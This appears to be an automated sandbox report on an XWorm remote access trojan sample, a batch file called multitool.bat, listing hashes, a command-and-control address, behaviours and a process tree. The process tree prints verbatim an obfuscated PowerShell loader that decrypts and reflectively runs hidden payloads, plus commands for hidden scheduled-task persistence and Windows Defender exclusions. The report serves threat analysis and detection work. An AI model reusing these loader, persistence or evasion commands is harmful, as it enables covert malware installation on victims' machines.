xworm | 8f6e309171ab8b968764573f9a0252d70b793d36d6fccf1d7eb3fce7763cb74a

Analysis

max time kernel
110s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 00:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

multitool.bat
Size

298KB
MD5

18c5a8b94eb5c19cdd965fc9d4686a02
SHA1

ee67546afe31bcf09dc426955af03594cee62c0a
SHA256

8f6e309171ab8b968764573f9a0252d70b793d36d6fccf1d7eb3fce7763cb74a
SHA512

8b8e0bb6b8b7f9ff1ff75ead07f999b7bbba7fe787d2b731685cd539c76fef1dcf2461fc6be2be49660e352de051003266bb7f664d4d41bf8a2dff120543f1ec
SSDEEP

6144:mxdIea9oQDm/ParmLX7WrxDShuILbormGyOVYKBOc97:mxQNDm3ar6XqrxQHsr/xHBT

Score

10^/10

xworm discovery execution persistence phishing rat trojan

Malware Config

Extracted

Family

xworm

85.209.133.220:111

Attributes

Install_directory
%AppData%
install_file
system.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/3916-1379-0x00000285612D0000-0x00000285612DE000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3916-51-0x0000028561360000-0x000002856137A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
22	3916	powershell.exe
29	3916	powershell.exe
31	3916	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4788	powershell.exe
2876	powershell.exe
2868	powershell.exe
912	powershell.exe
1608	powershell.exe
1860	powershell.exe
3916	powershell.exe

A potential corporate email address has been identified in the URL: currency-file@1
phishing
A potential corporate email address has been identified in the URL: prebid-js-external-js-lucead@master
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Roaming\\system.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763624423679221"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1156	WINWORD.EXE
1156	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1608	powershell.exe
1608	powershell.exe
1860	powershell.exe
1860	powershell.exe
3916	powershell.exe
3916	powershell.exe
4788	powershell.exe
4788	powershell.exe
4788	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
2868	powershell.exe
2868	powershell.exe
2868	powershell.exe
912	powershell.exe
912	powershell.exe
912	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
1120	chrome.exe
1120	chrome.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3916	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs

pid	Process
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
6076	msedge.exe
6076	msedge.exe
1120	chrome.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	1860	powershell.exe
Token: SeSecurityPrivilege	1860	powershell.exe
Token: SeTakeOwnershipPrivilege	1860	powershell.exe
Token: SeLoadDriverPrivilege	1860	powershell.exe
Token: SeSystemProfilePrivilege	1860	powershell.exe
Token: SeSystemtimePrivilege	1860	powershell.exe
Token: SeProfSingleProcessPrivilege	1860	powershell.exe
Token: SeIncBasePriorityPrivilege	1860	powershell.exe
Token: SeCreatePagefilePrivilege	1860	powershell.exe
Token: SeBackupPrivilege	1860	powershell.exe
Token: SeRestorePrivilege	1860	powershell.exe
Token: SeShutdownPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1860	powershell.exe
Token: SeRemoteShutdownPrivilege	1860	powershell.exe
Token: SeUndockPrivilege	1860	powershell.exe
Token: SeManageVolumePrivilege	1860	powershell.exe
Token: 33	1860	powershell.exe
Token: 34	1860	powershell.exe
Token: 35	1860	powershell.exe
Token: 36	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	1860	powershell.exe
Token: SeSecurityPrivilege	1860	powershell.exe
Token: SeTakeOwnershipPrivilege	1860	powershell.exe
Token: SeLoadDriverPrivilege	1860	powershell.exe
Token: SeSystemProfilePrivilege	1860	powershell.exe
Token: SeSystemtimePrivilege	1860	powershell.exe
Token: SeProfSingleProcessPrivilege	1860	powershell.exe
Token: SeIncBasePriorityPrivilege	1860	powershell.exe
Token: SeCreatePagefilePrivilege	1860	powershell.exe
Token: SeBackupPrivilege	1860	powershell.exe
Token: SeRestorePrivilege	1860	powershell.exe
Token: SeShutdownPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1860	powershell.exe
Token: SeRemoteShutdownPrivilege	1860	powershell.exe
Token: SeUndockPrivilege	1860	powershell.exe
Token: SeManageVolumePrivilege	1860	powershell.exe
Token: 33	1860	powershell.exe
Token: 34	1860	powershell.exe
Token: 35	1860	powershell.exe
Token: 36	1860	powershell.exe
Token: SeIncreaseQuotaPrivilege	1860	powershell.exe
Token: SeSecurityPrivilege	1860	powershell.exe
Token: SeTakeOwnershipPrivilege	1860	powershell.exe
Token: SeLoadDriverPrivilege	1860	powershell.exe
Token: SeSystemProfilePrivilege	1860	powershell.exe
Token: SeSystemtimePrivilege	1860	powershell.exe
Token: SeProfSingleProcessPrivilege	1860	powershell.exe
Token: SeIncBasePriorityPrivilege	1860	powershell.exe
Token: SeCreatePagefilePrivilege	1860	powershell.exe
Token: SeBackupPrivilege	1860	powershell.exe
Token: SeRestorePrivilege	1860	powershell.exe
Token: SeShutdownPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeSystemEnvironmentPrivilege	1860	powershell.exe
Token: SeRemoteShutdownPrivilege	1860	powershell.exe
Token: SeUndockPrivilege	1860	powershell.exe
Token: SeManageVolumePrivilege	1860	powershell.exe
Token: 33	1860	powershell.exe
Token: 34	1860	powershell.exe
Token: 35	1860	powershell.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
1120	chrome.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe
6076	msedge.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3916	powershell.exe
1156	WINWORD.EXE
1156	WINWORD.EXE
1156	WINWORD.EXE
1156	WINWORD.EXE
1156	WINWORD.EXE
1156	WINWORD.EXE
1156	WINWORD.EXE
1156	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1236 wrote to memory of 1608	1236	cmd.exe	87
PID 1236 wrote to memory of 1608	1236	cmd.exe	87
PID 1608 wrote to memory of 1860	1608	powershell.exe	89
PID 1608 wrote to memory of 1860	1608	powershell.exe	89
PID 1608 wrote to memory of 1876	1608	powershell.exe	95
PID 1608 wrote to memory of 1876	1608	powershell.exe	95
PID 1876 wrote to memory of 4552	1876	WScript.exe	96
PID 1876 wrote to memory of 4552	1876	WScript.exe	96
PID 4552 wrote to memory of 3916	4552	cmd.exe	98
PID 4552 wrote to memory of 3916	4552	cmd.exe	98
PID 3916 wrote to memory of 412	3916	powershell.exe	99
PID 3916 wrote to memory of 412	3916	powershell.exe	99
PID 3916 wrote to memory of 4788	3916	powershell.exe	107
PID 3916 wrote to memory of 4788	3916	powershell.exe	107
PID 3916 wrote to memory of 2876	3916	powershell.exe	109
PID 3916 wrote to memory of 2876	3916	powershell.exe	109
PID 3916 wrote to memory of 2868	3916	powershell.exe	111
PID 3916 wrote to memory of 2868	3916	powershell.exe	111
PID 3916 wrote to memory of 912	3916	powershell.exe	113
PID 3916 wrote to memory of 912	3916	powershell.exe	113
PID 1120 wrote to memory of 536	1120	chrome.exe	128
PID 1120 wrote to memory of 536	1120	chrome.exe	128
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 4088	1120	chrome.exe	129
PID 1120 wrote to memory of 412	1120	chrome.exe	130
PID 1120 wrote to memory of 412	1120	chrome.exe	130
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131
PID 1120 wrote to memory of 1876	1120	chrome.exe	131

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\multitool.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBJDaMkDdd/LxYfLWK+RbSkMlTUv9paU/GK4TKxeeEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1ld09wShPLv4usAwXhH2Uw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DMVZH=New-Object System.IO.MemoryStream(,$param_var); $yMzsP=New-Object System.IO.MemoryStream; $XKOrm=New-Object System.IO.Compression.GZipStream($DMVZH, [IO.Compression.CompressionMode]::Decompress); $XKOrm.CopyTo($yMzsP); $XKOrm.Dispose(); $DMVZH.Dispose(); $yMzsP.Dispose(); $yMzsP.ToArray();}function execute_function($param_var,$param2_var){ $hlsRs=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZDZIA=$hlsRs.EntryPoint; $ZDZIA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\multitool.bat';$djbrx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\multitool.bat').Split([Environment]::NewLine);foreach ($UOgVo in $djbrx) { if ($UOgVo.StartsWith(':: ')) { $IGItJ=$UOgVo.Substring(3); break; }}$payloads_var=[string[]]$IGItJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_772_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_772.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_772.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_772.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBJDaMkDdd/LxYfLWK+RbSkMlTUv9paU/GK4TKxeeEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1ld09wShPLv4usAwXhH2Uw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DMVZH=New-Object System.IO.MemoryStream(,$param_var); $yMzsP=New-Object System.IO.MemoryStream; $XKOrm=New-Object System.IO.Compression.GZipStream($DMVZH, [IO.Compression.CompressionMode]::Decompress); $XKOrm.CopyTo($yMzsP); $XKOrm.Dispose(); $DMVZH.Dispose(); $yMzsP.Dispose(); $yMzsP.ToArray();}function execute_function($param_var,$param2_var){ $hlsRs=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZDZIA=$hlsRs.EntryPoint; $ZDZIA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_772.bat';$djbrx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_772.bat').Split([Environment]::NewLine);foreach ($UOgVo in $djbrx) { if ($UOgVo.StartsWith(':: ')) { $IGItJ=$UOgVo.Substring(3); break; }}$payloads_var=[string[]]$IGItJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\loaded.bat" "
        6⤵
        
        PID:412
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4788
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2876
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\system.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2868
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:912

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\UninstallRemove.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa90c5cc40,0x7ffa90c5cc4c,0x7ffa90c5cc58
  2⤵
  PID:536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:2
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2408 /prefetch:3
  2⤵
  PID:412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2648 /prefetch:8
  2⤵
  PID:1876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
  2⤵
  PID:1788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4540,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:1
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,18353692029476321600,6135354155704033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:1328
- C:\Program Files\Google\Chrome\Application\chrome.exe
